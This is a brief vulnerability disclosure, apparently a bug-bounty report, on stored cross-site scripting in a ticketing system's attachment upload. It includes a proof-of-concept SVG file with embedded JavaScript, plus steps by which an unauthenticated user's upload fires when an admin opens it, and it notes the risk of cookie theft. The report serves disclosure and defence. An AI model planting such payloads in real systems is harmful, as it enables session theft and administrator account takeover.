Stored XSS via upload ‘Attachments’ with format .svg or .html
When opening the attachment, some format files will be rendered and loaded on the browser. So it allows executing arbitrary javascript code that was injected into attachment before.
// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Create a ticket with an unauthenticated user
Upload .svg or .html into attachments
The XSS will trigger when the admin open the attachment
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.